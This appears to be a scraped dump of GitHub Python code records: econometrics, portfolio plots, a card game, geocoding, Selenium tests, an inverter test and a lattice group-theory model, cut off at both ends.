od)\nmod2 = lm.PanelOLS.from_formula('''Rate ~ \nFakeTreat2 + EntityEffects + TimeEffects''', od)\n\nclfe1 = mod1.fit(cov_type='clustered',\n cluster_entity=True)\nclfe2 = mod1.fit(cov_type='clustered',\n cluster_entity=True)\n\nprint(clfe1)\nprint(clfe2)\n","repo_name":"JackHCC/Awesome-Uplift-Model","sub_path":"Example/The_Effect/Difference-in-Differences/example_2.py","file_name":"example_2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"81"} +{"seq_id":"72474647305","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 29 16:03:23 2022\r\n\r\n@author: evely\r\n\"\"\"\r\n\r\n#Evelyn Baranski\r\n#3/29/22\r\n#Efficient Portfolios\r\n\r\n\r\n#This file is plotting stock prices, cumulative change, and efficient frontier\r\n\r\n\r\n#Importing required packages\r\nimport numpy as np\r\nimport datetime as dt\r\nimport matplotlib.pyplot as plt\r\n\r\n#importing from previous task\r\nfrom efficient_port import *\r\n\r\n\r\n#Plotting prices\r\ndef plot_stock_prices(symbols):\r\n \"\"\"This function creates a graph of historical stock\r\n prices for however many stocks given in string \r\n 'symbols'.\"\"\"\r\n \r\n #getting df for the stock prices\r\n prices_df = get_stock_prices_from_csv_files(symbols)\r\n \r\n #Gettng x value - Date\r\n x = prices_df.index\r\n \r\n \r\n #iterating through columns in df, plotting with x\r\n for col in prices_df.columns:\r\n \r\n y = prices_df[col]\r\n plt.plot(x, y)\r\n \r\n \r\n #altering titles & labels on graph\r\n plt.xlabel('Date')\r\n plt.ylabel('Price')\r\n plt.title('Stock Prices')\r\n \r\n #adjusting the tiks for x axis\r\n plt.xticks(x[::2], rotation = 45)\r\n plt.locator_params(axis='x', nbins=len(x)/15)\r\n\r\n plt.show()\r\n\r\n\r\n#Plotting cumulative change\r\ndef plot_stock_cumulative_change(symbols):\r\n \"\"\"This function plots a graph of cumulative stock returns for\r\n stocks within the list, symbols. Monthly cumulative stock returns.\"\"\"\r\n \r\n stock_df = get_stock_prices_from_csv_files(symbols)\r\n\r\n #getting cumulative changes in price\r\n cum_change = ((stock_df.iloc[0:] - stock_df.iloc[0]) / stock_df.iloc[0]) + 1\r\n \r\n \r\n #plotting:\r\n #setting x variable\r\n x = stock_df.index\r\n \r\n #iterating through columns in df, plotting with x\r\n for col in cum_change.columns:\r\n \r\n y = cum_change[col]\r\n plt.plot(x, y)\r\n \r\n \r\n #altering titles & labels on graph\r\n plt.xlabel('Date')\r\n plt.ylabel('Relative Price')\r\n plt.title('Cumulative Change in Stock Price')\r\n \r\n #adjusting the tiks for x axis\r\n plt.xticks(x[::2], rotation = 45)\r\n plt.locator_params(axis='x', nbins=len(x)/15)\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n#Plotting efficient frontier\r\ndef plot_efficient_frontier(symbols):\r\n \"\"\"This function creates a graph of the efficient frontier\r\n (set of min var portfolios) that can be aacheived using\r\n small set of assets.\"\"\"\r\n \r\n #getting values to calculate range of rate of return\r\n returns = get_stock_returns_from_csv_files(symbols)\r\n cov = get_covariance_matrix(returns)\r\n\r\n e = np.matrix(returns.mean())\r\n v = np.matrix(cov)\r\n w = calc_global_min_variance_portfolio(v)\r\n ret = calc_portfolio_return(e, w)\r\n\r\n #creating min and max values for rs\r\n min_rs = ret - (ret * 5)\r\n max_rs = ret + (ret * 5)\r\n \r\n \r\n #rates of returns (rs) array\r\n rs = np.linspace(min_rs, max_rs)\r\n \r\n #standard deviation array\r\n stdev_array = calc_efficient_portfolios_stdev(e, v, rs)\r\n \r\n\r\n #Plotting stdev vs. list of rates\r\n plt.plot(stdev_array, rs)\r\n \r\n #adding chart titles, etc.\r\n plt.xlabel('Portfolio Standard Deviation')\r\n plt.ylabel('Portfolio Expected Return')\r\n plt.title('Efficient Frontier')\r\n \r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n symbols = ['AAPL', 'DIS', 'GOOG', 'KO', 'WMT']\r\n \r\n #plot_stock_prices(symbols)\r\n \r\n plot_stock_cumulative_change(symbols)\r\n \r\n #plot_efficient_frontier(symbols)\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"evelyngbaranski/Efficient_Portfolios","sub_path":"plotting_efficient_port.py","file_name":"plotting_efficient_port.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16215028965","text":"import core.src.action_frames as frames\nimport core.src.ret_code as ret_code\nimport ext.src.common_checking as checking\nfrom ext.src.hint_common import fix_target_action, target_filter, range_filter\n\ndef steal_action(gc, args):\n cards = gc.cards_by_ids(args['use'])\n checking.only_one_card_named_as(cards, 'steal')\n return steal_check(gc, args)\n\ndef steal_check(gc, args):\n targets_ids = args['targets']\n user = gc.player_by_token(args['token'])\n cards = gc.cards_by_ids(args['use'])\n checking.only_one_target(targets_ids)\n target = gc.player_by_id(targets_ids[0])\n checking.valid_target(user, target, 'steal')\n checking.forbid_target_self(user, target)\n checking.forbid_target_no_card(target, gc)\n checking.within_range(gc, user, target, 'steal')\n\n gc.use_cards_for_players(user, targets_ids, args['action'], cards)\n hint = { 'regions': target.all_regions(gc) }\n gc.push_frame(\n frames.AcceptMessage(gc, [user], 'region', hint,\n lambda a: on_region(gc, user, target, a)))\n return { 'code': ret_code.OK }\n\ndef steal_target(gc, user):\n players = filter(lambda p: gc.player_has_cards(p), gc.succeeding_players())\n players = range_filter(gc, user, 'steal', players)\n return fix_target_action(target_filter('steal', user, players))\n\ndef on_region(gc, user, target, args):\n region = args['region']\n if region == 'onhand':\n cards = gc.random_pick_cards(target, 1)\n if len(cards) == 0:\n raise ValueError('bad region')\n gc.private_cards_transfer(target, user, cards)\n else:\n gc.public_cards_transfer(target, user,\n [target.unequip_check(gc, region)])\n","repo_name":"zheplusplus/sgs","sub_path":"ext/src/sleevecards/steal.py","file_name":"steal.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"7871463953","text":"import pymysql\n\nconnection= pymysql.connect(host='localhost', user='root', db='bot')\n\na = connection.cursor()\n\nquery = 'select * from place'\n\na.execute(query)\n\n\nmainList = []\ndata = a.fetchall()\n\n\nfor row in data:\n currList = []\n\n col = 0\n for rowEntry in row:\n if col > 1:\n currList.append(rowEntry)\n\n col += 1\n mainList.append(currList)\n\nprint(mainList)\n\n\n\n\n\n","repo_name":"mercury9181/chat_bot","sub_path":"mysql_prac.py","file_name":"mysql_prac.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31638135988","text":"# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport xlrd, xlwt\nimport mf\nimport sys\n\n#用于测试高德api是否能正确读取到想要的值\n\n# print(sys.path[0])\n# 可更改参数#####################################\nexcel_name = '地址名称数据_襄阳南路500m.xls'\n# 打开excel表格读取数据于data中\ndata = xlrd.open_workbook(sys.path[0] + '/襄阳南路/半径_襄阳南路500m.xls')\n################################################\n# 选中第一个sheet\ntable = data.sheets()[0]\n#创建写数据的excel\nbook = xlwt.Workbook(encoding='utf-8')\nsheet = book.add_sheet('Sheet1')\nsheet.write(0, 0, '序号')\nsheet.write(0, 1, '地址名称')\nsheet.write(0, 2, '最短距离')\nsheet.write(0, 3, '感兴趣点数')\nsheet.write(0, 4, '距离')\n\n\n# 读取经纬度\nfor i in range(table.nrows):\n if i == 0:\n continue\n xuhao = table.cell(i, 0).value# 获取坐标表格中的序号\n distance = table.cell(i, 3).value# 获取坐标表格中的距离信息\n print('行:', i, '序号:', xuhao)# 打印序号\n jingdu = round(table.cell(i, 1).value, 6)# 获取表格中的经度\n weidu = round(table.cell(i, 2).value, 6) # 获取表格中的纬度\n url = 'http://restapi.amap.com/v3/geocode/regeo?output=json&location='+str(jingdu)+','+str(weidu)+\\\n '&key=389880a06e3f893ea46036f030c94700&radius=100&extensions=all'\n res = requests.get(url)\n params = json.loads(res.text)\n # 100米内无感兴趣点即跳过\n if len(params[\"regeocode\"][\"pois\"]) == 0:\n sheet.write(i, 0, xuhao)\n sheet.write(i, 1, '无')\n print('无无无无')\n continue\n # 比较各感兴趣点与坐标点的距离,选择最近的那个\n d_poi = {}\n for poi in params[\"regeocode\"][\"pois\"]:\n # print(poi['name'], poi['distance'])\n d_poi[poi['name']] = float(poi['distance'])# 加入字典\n min_distance = min(d_poi.values())\n name = mf.get_keys(d_poi, min_distance)\n print(name[0], min_distance)\n sheet.write(i, 0, xuhao)\n sheet.write(i, 1, name[0])\n sheet.write(i, 2, min_distance)\n sheet.write(i, 3, len(params[\"regeocode\"][\"pois\"]))\n sheet.write(i, 4, distance)\n book.save('D:/软件学习_Software/python/高德API_找半径/虹古路/'+excel_name)\n # if i == 10:\n # break\n\nprint('finish')\n\n\n","repo_name":"crazybanboo/gaodeMap","sub_path":"mapSearch.py","file_name":"mapSearch.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29390654261","text":"s = \"kibria\"\nl = len(s)\nc = 0\nfor i in range(l): \n if(s[i] != s[l-i-1]): \n c = 1\n break\n\nif c == 0: \n print(\"yes\")\nelse: \n print(\"Not palindrome\")","repo_name":"himelhrh/Python","sub_path":"Exercise/31. Palindrome.py","file_name":"31. Palindrome.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73249739785","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass TestAbs(unittest.TestCase):\n variables = [\n {\n 'selector': \".first_class > input\",\n 'value': \"Ivan\",\n 'By': By.CSS_SELECTOR\n },\n {\n 'selector': \"[placeholder='Input your last name']\",\n 'value': \"Petrov\",\n 'By': By.CSS_SELECTOR\n },\n {\n 'selector': \"//input[contains(@placeholder,'email')]\",\n 'value': \"Email\",\n 'By': By.XPATH\n },\n {\n 'selector': \"//button[@type='submit']\",\n 'value': None,\n 'By': By.XPATH\n },\n {\n 'selector': \"h1\",\n 'value': None,\n 'By': By.TAG_NAME\n }\n ]\n time_remaining = 2\n\n def body_of_tests(self, link):\n try:\n browser = webdriver.Chrome()\n for i in range(len(self.variables) - 2):\n browser.find_element(\n self.variables[i]['By'], self.variables[i]['selector']).send_keys(\n self.variables[i]['value']\n )\n\n browser.find_element(\n self.variables[3]['By'], self.variables[3]['selector']).click()\n\n welcome_text = WebDriverWait(browser, self.time_remaining).until(\n EC.element_to_be_clickable((\n self.variables[4]['By'], self.variables[4]['selector']))\n ).text\n\n self.assertEqual(\n \"Congratulations! You have successfully registered!\", welcome_text,\n \"Text is not Equal\")\n finally:\n browser.quit()\n\n def test_first_link(self):\n self.body_of_tests('http://suninjuly.github.io/registration1.html')\n\n def test_second_link(self):\n self.body_of_tests('http://suninjuly.github.io/registration2.html')\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Dorivan/stepik_auto_tests_course","sub_path":"stepik_py/lesson_3/3.2/test_3_2_13.py","file_name":"test_3_2_13.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7576779921","text":"'''\nexcel_funcs.py (Excel Command Line Tool)\nSydney Fowler and Matthew Hileman\n15 December 2019\nDescription: Common excel related methods used throughout several tools.\n Includes: get_directory, save_file, get_sheet\n'''\n\n# ================ IMPORTS ================\n# System\nimport os\n\n# Custom\nimport menus\n\n# ================ METHODS ================\n# Get file function, used in various tools\ndef get_directory(type_array, message):\n\n print()\n print(\" Input a file \".center(70, \"=\"))\n print('-' * 70)\n\n # Initialize error flag\n error_found = 0\n while True:\n\n # Import path input\n file_path = input(message)\n\n # Check that file exists\n if os.path.exists(file_path):\n for type in type_array:\n\n # Checks for correct file type\n if file_path[-len(type):] != type:\n error_found = 1\n else:\n error_found = 0\n\n # If incorrect file type, print error, loop.\n if error_found:\n print(\"ERROR: Invalid file TYPE. Must be \" + str(type_array))\n print()\n continue\n else:\n print('-' * 40)\n print()\n break\n\n # If incorrect path or file does not exist, print error, loop.\n else:\n print(\"ERROR: Invalid file PATH.\")\n print()\n continue\n\n # Happy path, returns file and file path. Will return path if no file.\n return file_path\n\n\n# Saves copy of a wb\ndef save_file(wb, wb_path, type):\n\n print()\n print(\" Enter a name for new save file \".center(70, \"=\"))\n print('-' * 70)\n\n # Removes original file name\n save_path = os.path.dirname(os.path.abspath(wb_path))\n\n # Gets name for new file\n save_path += \"/\" + input(\"Input new file's name (saves to same directory): \") + type\n\n # Save to a new copy of the workbook\n wb.save(save_path)\n print(\"Done! New file saved to \" + save_path)\n input(\"Press enter to continue...\")\n\n\n# Has user select sheet to perform actions on\ndef get_sheet(wb):\n\n # Creates menu\n sheets = wb.sheetnames # Edited depreciated function: \"wb.get_sheet_names()\"\n sheet_menu = menus.Value_Menu(\"duplicate_removal\", sheets, sheets)\n print()\n print(\" Choose a sheet to remove duplicates \".center(70, \"=\"))\n print('-' * 70)\n\n # User selects sheet to use, returns that sheet\n sheet = wb.get_sheet_by_name(sheet_menu.display_shift_menu())\n return sheet\n","repo_name":"sydneyfowler/CS3030","sub_path":"excel_funcs.py","file_name":"excel_funcs.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70673382985","text":"# 2.Write a program to find nth fibonacci number with recursion?\n# A Fibonacci series is a series in which next number is a sum of previous two numbers.\n#\n# For example : 0, 1, 1, 2, 3, 5, 8\n# First Fibonacci number is 0, second is 1, third is 2 and etc.\n# Input: fib(2)\n# Output: 1\n# After implemetation of this task: Write a Python program to check if a given number is a Fibonacci number or not.\n# Input: 8\n# Output: True\n\n\ndef fibonacci(n):\n print(n)\n if n <= 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\ndef list_sum(num_List):\n if len(num_List) == 1:\n return num_List[0]\n else:\n return num_List[0] + list_sum(num_List[1:])\n\n\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\n\ndef fib(n):\n if n <= 1:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef power(base, exp):\n if exp == 0:\n return 1\n if exp == 1:\n return base\n else:\n return base * (power(base, exp - 1))\n\n# Кулите на Ханой!\ndef toh(n, start, end, aux):\n if (n == 1):\n print(\"Move disk 1 from\", start, \"to\", end)\n return\n toh(n - 1, start, aux, end)\n print(\"Move disk\", n, \"from\", start, \"to\", end)\n toh(n - 1, aux, end, start)\n\n\nif __name__ == \"__main__\":\n # n = 5\n # result = fibonacci(n)\n # print(result)\n #\n # print(list_sum([2, 4, 5, 6, 7]))\n #\n # print(factorial(5))\n toh(5, \"I\", \"II\", \"III\")\n","repo_name":"reniboyanova/python_most_common_interview_tasks","sub_path":"recursion_tasks.py","file_name":"recursion_tasks.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21530808000","text":"from unittest.mock import Mock\n\nimport pytest\nimport requests_mock\n\nfrom helpermodules import compatibility\nfrom modules.common.store._api import LoggingValueStore\nfrom modules.devices.fronius import inverter\nfrom modules.devices.fronius.config import FroniusConfiguration, FroniusInverterSetup\nfrom test_utils.mock_ramdisk import MockRamdisk\n\nSAMPLE_IP = \"1.1.1.1\"\n\n\n@pytest.fixture\ndef mock_ramdisk(monkeypatch):\n monkeypatch.setattr(compatibility, \"is_ramdisk_in_use\", lambda: True)\n return MockRamdisk(monkeypatch)\n\n\ndef test_update(monkeypatch, requests_mock: requests_mock.Mocker, mock_ramdisk, mock_simcount):\n wr = inverter.FroniusInverter(0, FroniusInverterSetup(), FroniusConfiguration(ip_address=SAMPLE_IP))\n\n mock = Mock(return_value=None)\n monkeypatch.setattr(LoggingValueStore, \"set\", mock)\n mock_simcount.return_value = 0, 0\n requests_mock.get(\n \"http://\" + SAMPLE_IP + \"/solar_api/v1/GetPowerFlowRealtimeData.fcgi\",\n json=json_wr1)\n\n wr.update()\n\n # mock.assert_called_once()\n inverter_state = mock.call_args[0][0]\n assert inverter_state.exported == 0\n assert inverter_state.currents == [0, 0, 0]\n assert inverter_state.power == -196.08712768554688\n\n\njson_wr1 = {\n \"Body\": {\n \"Data\": {\n \"Inverters\": {\n \"1\": {\n \"Battery_Mode\": \"normal\",\n \"DT\": 1,\n \"E_Day\": None,\n \"E_Total\": 9824871.8336111102,\n \"E_Year\": None,\n \"P\": 1263.8095703125,\n \"SOC\": 41.100000000000001\n }\n },\n \"Site\": {\n \"BackupMode\": \"false\",\n \"BatteryStandby\": \"true\",\n \"E_Day\": None,\n \"E_Total\": 9824871.8336111102,\n \"E_Year\": None,\n \"Meter_Location\": \"grid\",\n \"Mode\": \"bidirectional\",\n \"P_Akku\": 1126.365966796875,\n \"P_Grid\": -107.8,\n \"P_Load\": -1143.5296386718751,\n \"P_PV\": 196.08712768554688,\n \"rel_Autonomy\": 100.0,\n \"rel_SelfConsumption\": 91.385163695601761\n },\n \"Smartloads\": {\n \"Ohmpilots\": {}\n },\n \"Version\": \"12\"\n }\n },\n \"Head\": {\n \"RequestArguments\": {},\n \"Status\": {\n \"Code\": 0,\n \"Reason\": \"\",\n \"UserMessage\": \"\"\n },\n \"Timestamp\": \"2022-01-04T09:45:59+00:00\"\n }\n}\n\njson_wr2 = {\n \"Body\": {\n \"Data\": {\n \"Inverters\": {\n \"1\": {\n \"DT\": 232,\n \"E_Day\": 172.69999694824219,\n \"E_Total\": 3372.76953125,\n \"E_Year\": 10754989,\n \"P\": 108\n }\n },\n \"Site\": {\n \"E_Day\": 172.69999694824219,\n \"E_Total\": 3372.7694444444446,\n \"E_Year\": 10754989,\n \"Meter_Location\": \"unknown\",\n \"Mode\": \"produce-only\",\n \"P_Akku\": None,\n \"P_Grid\": None,\n \"P_Load\": None,\n \"P_PV\": 108,\n \"rel_Autonomy\": None,\n \"rel_SelfConsumption\": None\n },\n \"Version\": \"12\"\n }\n },\n \"Head\": {\n \"RequestArguments\": {},\n \"Status\": {\n \"Code\": 0,\n \"Reason\": \"\",\n \"UserMessage\": \"\"\n },\n \"Timestamp\": \"2021-12-30T10:37:02+01:00\"\n }\n}\n","repo_name":"snaptec/openWB","sub_path":"packages/modules/devices/fronius/inverter_test.py","file_name":"inverter_test.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":322,"dataset":"github-code","pt":"81"} +{"seq_id":"17075110737","text":"import queue\nfrom enum import Enum\nfrom GoalTester import GoalTester\nfrom PathValidator import PathValidator\nfrom MapCreator import MapCreator\nclass PipeFinder(object):\n def FindPipe(self):\n actions = queue.Queue() # Actions Queue\n actions.put(\"\") # Initializing empty queue\n path = \"\" # First path in map\n mario_map = MapCreator().CreateMarioMap3() # Creating the map\n moves = [\"L\", \"R\", \"U\", \"D\"]\n while not GoalTester().findEnd(mario_map, path): # == False:\n path = actions.get() # Set of moves Ex. LLURU\n for move in moves:\n posible_path = path + move\n if PathValidator().Valid(mario_map, posible_path): # Validates if a path is posible\n actions.put(posible_path)","repo_name":"ASDIO1/mario-map-diego-sanchez","sub_path":"PipeFinder.py","file_name":"PipeFinder.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15427447999","text":"import math\nimport itertools\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributions as dist\nimport torch_scatter\n\ndevice = torch.device('cpu') # default\n\n\"\"\" -------- Infrastructures -------- \"\"\"\n\nclass Lattice(object):\n \"\"\" Hosts lattice information and construct causal graph\n \n Args:\n size: number of size along one dimension (assuming square/cubical lattice)\n dimension: dimension of the lattice\n \"\"\"\n def __init__(self, size:int, dimension:int):\n self.size = size\n self.dimension = dimension\n self.shape = [size]*dimension\n self.sites = size**dimension\n self.tree_depth = self.sites.bit_length()\n self.node_init()\n \n def __repr__(self):\n return 'Lattice({} grid with tree depth {})'.format(\n 'x'.join(str(L) for L in self.shape),\n self.tree_depth)\n \n def node_init(self):\n \"\"\" Node initialization, calculate basic node information\n for other methods in this class to work.\n Called by class initialization. \"\"\"\n self.node_index = torch.zeros(self.sites, dtype=torch.long)\n def partition(rng: torch.Tensor, dim: int, ind: int, lev: int):\n if rng[dim].sum()%2 == 0:\n mid = rng[dim].sum()//2\n rng1 = rng.clone()\n rng1[dim, 1] = mid\n rng2 = rng.clone()\n rng2[dim, 0] = mid\n partition(rng1, (dim + 1)%self.dimension, 2*ind, lev+1)\n partition(rng2, (dim + 1)%self.dimension, 2*ind + 1, lev+1)\n else:\n self.node_index[ind-self.sites] = rng[:,0].dot(self.size**torch.arange(0,self.dimension).flip(0))\n partition(torch.tensor([[0, self.size]]*self.dimension), 0, 1, 1)\n \n def causal_graph(self, k = 3):\n \"\"\" Construct causal graph \n Args: k - number of generations to consider\n \"\"\"\n self.family = {} # a dict hosting all relatives\n def child(i, k): # kth-generation child of node i\n return set(2**k * i + q for q in range(2**k))\n def relative(k0, k1): # (k0, k1)-relatives\n # two nodes i0 and i1 are (k0, k1)-relative,\n # if their closest common ancestor is k0 and k1 generations from them respectively\n if (k0, k1) not in self.family: # if relation not found\n rels = set() # start collecting relative relations\n for i in range(1, self.sites//2**max(k0, k1)): # for every possible common ancestor\n ch0 = child(i, k0) # set of k0-child\n ch1 = child(i, k1) # set of k1-child\n rels |= set((i0, i1) for i0 in ch0 for i1 in ch1 if i0 <= i1)\n for k in range(min(k0, k1)): # exlusing closer relatives\n rels -= relative(k0 - k - 1, k1 - k - 1)\n self.family[(k0, k1)] = rels # record the relations\n return self.family[(k0, k1)]\n # collect all relatives within k generations\n typ = 0\n gen = {}\n for k1 in range(0, k):\n for k0 in range(0, k1 + 1):\n gen[typ] = relative(k0, k1)\n typ += 1\n index_list = [torch.tensor(sorted(list(gen[typ]))).t() for typ in gen]\n type_list = [torch.Tensor().new_full((1, len(gen[typ])), typ, dtype=torch.long) for typ in gen]\n graph = torch.cat([torch.cat(index_list, -1), torch.cat(type_list, -1)], 0)\n return graph.to(device)\n\nclass Group(object):\n \"\"\"Represent a group, providing multiplication and inverse operation.\n \n Args:\n mul_table: multiplication table as a tensor, e.g. Z2 group: tensor([[0,1],[1,0]])\n \"\"\"\n def __init__(self, mul_table: torch.Tensor):\n super(Group, self).__init__()\n self.mul_table = mul_table.to(device)\n self.order = mul_table.size(0) # number of group elements\n gs, ginvs = torch.nonzero(self.mul_table == 0, as_tuple=True)\n self.inv_table = torch.gather(ginvs, 0, gs).to(device)\n self.val_table = None\n \n def __iter__(self):\n return iter(range(self.order))\n \n def __repr__(self):\n return 'Group({} elements)'.format(self.order)\n \n def inv(self, input: torch.Tensor):\n return torch.gather(self.inv_table.expand(input.size()[:-1]+(-1,)), -1, input)\n \n def mul(self, input1: torch.Tensor, input2: torch.Tensor):\n output = input1 * self.order + input2\n return torch.gather(self.mul_table.flatten().expand(output.size()[:-1]+(-1,)), -1, output)\n \n def prod(self, input, dim: int, keepdim: bool = False):\n input_size = input.size()\n flat_mul_table = self.mul_table.flatten().expand(input_size[:dim]+input_size[dim+1:-1]+(-1,))\n output = input.select(dim, 0)\n for i in range(1, input.size(dim)):\n output = output * self.order + input.select(dim, i)\n output = torch.gather(flat_mul_table, -1, output)\n if keepdim:\n output = output.unsqueeze(dim)\n return output\n \n def val(self, input, val_table = None):\n if val_table is None:\n val_table = self.default_val_table()\n elif len(val_table) != self.order:\n raise ValueError('Group function value table must be of the same size as the group order, expect {} got {}.'.format(self.order, len(val_table)))\n return torch.gather(val_table.expand(input.size()[:-1]+(-1,)), -1, input)\n\n def default_val_table(self):\n if self.val_table is None:\n val_table = torch.zeros(self.order)\n val_table[0] = 1.\n self.val_table = val_table.to(device)\n return self.val_table\n\nclass SymmetricGroup(Group):\n \"\"\" Represent a permutation group \"\"\"\n def __init__(self, n: int):\n self.elements = list(itertools.permutations(range(n), n))\n index = {g:i for i, g in enumerate(self.elements)}\n mul_table = torch.empty([len(self.elements)]*2, dtype=torch.long)\n for g1 in self.elements:\n for g2 in self.elements:\n g = tuple(g1[a] for a in g2)\n mul_table[index[g1], index[g2]] = index[g]\n super(SymmetricGroup, self).__init__(mul_table)\n\n def default_val_table(self):\n if self.val_table is None:\n def cycle_number(g):\n if len(g) == 0:\n return 0\n elif g[0] == 0:\n return cycle_number(tuple(a - 1 for a in g[1:])) + 1\n else:\n return cycle_number(tuple(g[0] - 1 if a == 0 else a - 1 for a in g[1:]))\n val_table = torch.tensor([cycle_number(g) for g in self.elements], dtype=torch.float)\n self.val_table = val_table.to(device)\n return self.val_table\n\n\n\"\"\" -------- Energy Model -------- \"\"\"\n\nclass EnergyTerm(nn.Module):\n \"\"\" represent an energy term\"\"\"\n strength = 1.\n group = None\n lattice = None\n def __init__(self):\n super(EnergyTerm, self).__init__()\n \n def __mul__(self, other):\n self.strength *= other\n return self\n \n def __rmul__(self, other):\n return self * other\n \n def __neg__(self):\n return self * (-1)\n \n def __add__(self, other):\n if isinstance(other, EnergyTerm):\n return EnergyTerms([self, other])\n elif isinstance(other, EnergyTerms):\n return other.append(self)\n \n def __radd__(self, other):\n return self + other\n \n def __sub__(self, other):\n return self + (- other)\n \n def __rsub__(self, other):\n return (- self) + other\n \n def extra_repr(self):\n return '{}'.format(self.strength)\n \n def on(self, group: Group = None, lattice: Lattice = None):\n self.group = group\n self.lattice = lattice\n return self\n \n def forward(self):\n if self.group is None:\n raise RuntimeError('A group structure has not been linked before forward evaluation of the energy term. Call self.on(group = group) to link a Group.')\n if self.lattice is None:\n raise RuntimeError('A lattice system has not been linked before forward evaluation of the energy term. Call self.on(lattice = lattice) to link a Lattice.')\n\nclass EnergyTerms(nn.ModuleList):\n \"\"\" represent a sum of energy terms\"\"\"\n def __init__(self, *arg):\n super(EnergyTerms, self).__init__(*arg)\n \n def __mul__(self, other):\n for term in self:\n term = term * other\n return self\n \n def __rmul__(self, other):\n return self * other\n \n def __neg__(self):\n return self * (-1)\n \n def on(self, group: Group = None, lattice: Lattice = None):\n for term in self:\n term.on(group, lattice)\n return self\n \n def forward(self, input):\n return sum(term(input) for term in self)\n\nclass OnSite(EnergyTerm):\n \"\"\" on-site energy term \"\"\"\n def __init__(self, val_table = None):\n super(OnSite, self).__init__()\n self.val_table = val_table.to(device)\n \n def extra_repr(self):\n if not self.val_table is None:\n return 'G -> {}'.format((self.val_table * self.strength).tolist())\n else:\n return super(OnSite, self).extra_repr()\n \n def forward(self, input):\n super(OnSite, self).forward()\n dims = tuple(range(-self.lattice.dimension,0))\n energy = self.group.val(input, self.val_table) * self.strength\n return energy.sum(dims)\n \nclass TwoBody(EnergyTerm):\n \"\"\" two-body interaction term \"\"\"\n def __init__(self, val_table = None, shifts = None):\n super(TwoBody, self).__init__()\n self.val_table = val_table.to(device)\n self.shifts = shifts\n \n def extra_repr(self):\n if not self.val_table is None:\n return 'G -> {} across {}'.format(\n (self.val_table * self.strength).tolist(),\n self.shifts if not self.shifts is None else '(0,...)')\n elif not self.shifts is None:\n return '{} across {}'. format(\n self.strength,\n self.shifts)\n else:\n return super(TwoBody, self).extra_repr()\n \n def forward(self, input):\n super(TwoBody, self).forward()\n dims = tuple(range(-self.lattice.dimension,0))\n if self.shifts is None:\n self.shifts = (0,)*self.lattice.dimension\n rolled = self.group.inv(input.roll(self.shifts, dims))\n coupled = self.group.mul(rolled, input)\n energy = self.group.val(coupled, self.val_table) * self.strength\n return energy.sum(dims)\n\nclass Energy(nn.Module):\n \"\"\" Energy mdoel that describes the physical system. Provides function to evaluate energy.\n \n Args:\n energy: lattice Hamiltonian in terms of energy terms\n group: a specifying the group on each site\n lattice: a lattice system containing information of the group and lattice shape\n \"\"\"\n def __init__(self, energy: EnergyTerms, group: Group, lattice: Lattice):\n super(Energy, self).__init__()\n self.group = group\n self.lattice = lattice\n self.update(energy)\n \n def extra_repr(self):\n return '(group): {}\\n(lattice): {}'.format(self.group, self.lattice) + super(Energy, self).extra_repr()\n \n def forward(self, input):\n return self.energy(input)\n\n def update(self, energy):\n self.energy = energy.on(self.group, self.lattice)\n\n\"\"\" -------- Transformations -------- \"\"\"\n\nclass HaarTransform(dist.Transform):\n \"\"\" Haar wavelet transformation (bijective)\n transformation takes real space configurations x to wavelet space encoding y\n \n Args:\n group: a group structure for each unit\n lattice: a lattice system containing information of the group and lattice shape\n \"\"\"\n def __init__(self, group: Group, lattice: Lattice):\n super(HaarTransform, self).__init__()\n self.group = group\n self.lattice = lattice\n self.bijective = True\n self.make_wavelet()\n \n # construct Haar wavelet basis\n def make_wavelet(self):\n wavelet = torch.zeros(torch.Size([self.lattice.sites, self.lattice.sites]), dtype=torch.int)\n wavelet[0] = 1\n for z in range(1,self.lattice.tree_depth):\n block_size = 2**(z-1)\n for q in range(block_size):\n node_range = 2**(self.lattice.tree_depth-1-z) * torch.tensor([2*q+1,2*q+2])\n nodes = torch.arange(*node_range)\n sites = self.lattice.node_index[nodes]\n wavelet[block_size + q, sites] = 1 \n self.wavelet = wavelet.to(device)\n \n def _call(self, z):\n x = self.group.prod(z.unsqueeze(-1) * self.wavelet, -2)\n return 